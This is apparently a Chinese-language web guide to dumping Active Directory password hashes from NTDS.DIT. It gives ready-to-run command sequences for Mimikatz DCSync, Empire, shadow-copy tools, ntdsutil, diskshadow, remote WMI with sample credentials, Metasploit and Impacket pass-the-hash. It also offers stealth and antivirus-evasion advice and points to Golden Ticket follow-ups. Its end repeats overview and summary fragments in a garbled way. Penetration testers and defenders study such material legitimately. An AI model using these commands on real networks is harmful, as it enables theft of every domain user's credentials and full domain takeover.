域密码哈希提取技术全面指南<\/h1>

概述<\/h2>
在渗透测试中，获取域管理员权限后，提取域用户密码哈希是常见且关键的步骤。这些哈希存储在域控制器的NTDS.DIT文件中，本文详细介绍了多种提取这些哈希的技术方法。<\/p>

NTDS.DIT文件基础<\/h2>

位置<\/strong>: C:\Windows\NTDS\NTDS.dit<\/code><\/li>
特点<\/strong>: 始终被操作系统使用，无法直接复制<\/li>

包含内容<\/strong>: 所有域用户的密码哈希、组成员身份等关键信息<\/li> <\/ul> 提取方法分类<\/h2> 1. 使用Mimikatz<\/h3> DCSync技术<\/h4> # 提取所有域用户哈希<\/span> <\/span><\/span>lsadump::dcsync \/domain:pentestlab.local \/all \/csv <\/span><\/span> <\/span><\/span># 提取特定用户哈希<\/span> <\/span><\/span>lsadump::dcsync \/domain:pentestlab.local \/user:test <\/span><\/span><\/code><\/pre>特点<\/strong>: 利用目录复制服务(DRS)，无需直接操作域控制器，隐蔽性高<\/p> 通过LSASS进程<\/h4> privilege::debug <\/span><\/span>lsadump::lsa \/inject <\/span><\/span><\/code><\/pre>前提<\/strong>: 需要在域控制器上执行<\/p> 2. Empire框架<\/h3> 模块1<\/strong>: credentials\/mimikatz\/dcsync_hashdump<\/code><\/li> 模块2<\/strong>: 指定用户提取完整账户信息依赖<\/strong>: 需要域管理员权限，使用Invoke-Mimikatz PowerShell脚本<\/li> <\/ul> 3. Nishang PowerShell框架<\/h3> Import-Module .\Copy-VSS.ps1 <\/span><\/span>Copy-VSS <\/span><\/span># 或指定目录<\/span> <\/span><\/span>Copy-VSS -DestinationDir C:\ShadowCopy\ <\/span><\/span><\/code><\/pre>功能<\/strong>: 自动提取NTDS.DIT、SAM和SYSTEM文件<\/p> 4. PowerSploit<\/h3> Import-Module .\VolumeShadowCopyTools.ps1 <\/span><\/span>New-VolumeShadowCopy -Volume C:\ <\/span><\/span>Get-VolumeShadowCopy <\/span><\/span><\/code><\/pre>后续<\/strong>: 从新卷影拷贝中复制NTDS.DIT文件<\/p> 5. Invoke-DCSync<\/h3> Invoke-DCSync <\/span><\/span># 或PWDump格式<\/span> <\/span><\/span>Invoke-DCSync -PWDumpFormat <\/span><\/span><\/code><\/pre>输出格式<\/strong>:<\/p> 默认: Domain, User, RID和Hash四表<\/li> PWDump格式: user:id:lm:ntlm:::<\/code><\/li> <\/ul> 6. NTDSUTIL<\/h3> ntdsutil <\/span><\/span>activate instance ntds <\/span><\/span>ifm <\/span><\/span>create full C:\ntdsutil <\/span><\/span>quit <\/span><\/span>quit <\/span><\/span><\/code><\/pre>生成文件<\/strong>:<\/p> Active Directory<\/code>文件夹: NTDS.DIT<\/li> Registry<\/code>文件夹: SAM和SYSTEM<\/li> <\/ul> 7. Diskshadow<\/h3> 脚本示例<\/strong> (保存为diskshadow.txt):<\/p> set context persistent nowriters add volume c: alias someAlias create expose %someAlias% z: exec "cmd.exe" \/c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit delete shadows volume %someAlias% reset <\/code><\/pre> 执行<\/strong>:<\/p> diskshadow.exe \/s c:\diskshadow.txt <\/span><\/span><\/code><\/pre>8. WMI远程提取<\/h3> # 创建卷影拷贝 <\/span><\/span>wmic \/node:dc \/user:PENTESTLAB\David \/password:pentestlab123!! process call create "cmd \/c vssadmin create shadow \/for=C: 2>&1"<\/span> <\/span><\/span> <\/span><\/span># 复制NTDS.DIT <\/span><\/span>wmic \/node:dc \/user:PENTESTLAB\David \/password:pentestlab123!! process call create "cmd \/c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"<\/span> <\/span><\/span> <\/span><\/span># 复制SYSTEM文件 <\/span><\/span>wmic \/node:dc \/user:PENTESTLAB\David \/password:pentestlab123!! process call create "cmd \/c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"<\/span> <\/span><\/span><\/code><\/pre>9. VSSADMIN<\/h3> vssadmin create shadow \/for=C: <\/span><\/span>copy<\/span> \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy <\/span><\/span>copy<\/span> \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy <\/span><\/span><\/code><\/pre>10. vssown.vbs<\/h3> cscript vssown.vbs \/start <\/span><\/span>cscript vssown.vbs \/create c <\/span><\/span>cscript vssown.vbs \/list <\/span><\/span>cscript vssown.vbs \/delete <\/span><\/span><\/code><\/pre>11. Metasploit模块<\/h3> # NTDS抓取模块<\/span> <\/span><\/span>use auxiliary\/admin\/smb\/psexec_ntdsgrab <\/span><\/span> <\/span><\/span># 域哈希提取模块<\/span> <\/span><\/span>use windows\/gather\/credentials\/domain_hashdump <\/span><\/span> <\/span><\/span># 直接hashdump(风险高)<\/span> <\/span><\/span>hashdump <\/span><\/span><\/code><\/pre>12. fgdump<\/h3> fgdump.exe <\/span><\/span>type<\/span> 127.0.0.1.pwdump <\/span><\/span><\/code><\/pre>注意<\/strong>: 易被反病毒软件检测<\/p> 13. Impacket工具集<\/h3> # 本地提取<\/span> <\/span><\/span>impacket-secretsdump -system \/root\/SYSTEM -ntds \/root\/ntds.dit LOCAL <\/span><\/span> <\/span><\/span># 远程提取<\/span> <\/span><\/span>impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB\/dc\$<\/span>@10.0.0.1 <\/span><\/span><\/code><\/pre>14. NTDSDumpEx<\/h3> NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive <\/span><\/span><\/code><\/pre>15. adXtract脚本<\/h3> .\/adXtract.sh \/root\/ntds.dit \/root\/SYSTEM pentestlab <\/span><\/span><\/code><\/pre>输出<\/strong>: 用户列表和密码哈希，格式兼容John the Ripper和Hashcat<\/p> 关键注意事项<\/h2> SYSTEM文件重要性<\/strong>: 必须同时获取SYSTEM注册表配置单元才能解密NTDS.DIT内容<\/li> 隐蔽性考量<\/strong>: DCSync技术最为隐蔽，推荐在红队操作中使用<\/li> 风险操作<\/strong>: 直接在域控制器上使用hashdump可能导致系统崩溃<\/li> 反病毒规避<\/strong>: fgdump等传统工具易被检测，需谨慎使用<\/li> 后续利用<\/strong>: 提取的哈希可用于黄金票据(Golden Ticket)攻击等横向移动技术<\/li> <\/ol> 总结<\/h2> 本文涵盖了从基础到高级的多种域密码哈希提取技术，渗透测试人员应根据具体环境选择合适的方法，并特别注意操作的隐蔽性和潜在风险。<\/p>

域密码哈希提取技术全面指南<\/h1>

概述<\/h2> 在渗透测试中，获取域管理员权限后，提取域用户密码哈希是常见且关键的步骤。这些哈希存储在域控制器的NTDS.DIT文件中，本文详细介绍了多种提取这些哈希的技术方法。<\/p>

提取方法分类<\/h2>

1. 使用Mimikatz<\/h3>

总结<\/h2> 本文涵盖了从基础到高级的多种域密码哈希提取技术，渗透测试人员应根据具体环境选择合适的方法，并特别注意操作的隐蔽性和潜在风险。<\/p>

概述<\/h2>
在渗透测试中，获取域管理员权限后，提取域用户密码哈希是常见且关键的步骤。这些哈希存储在域控制器的NTDS.DIT文件中，本文详细介绍了多种提取这些哈希的技术方法。<\/p>

总结<\/h2>
本文涵盖了从基础到高级的多种域密码哈希提取技术，渗透测试人员应根据具体环境选择合适的方法，并特别注意操作的隐蔽性和潜在风险。<\/p>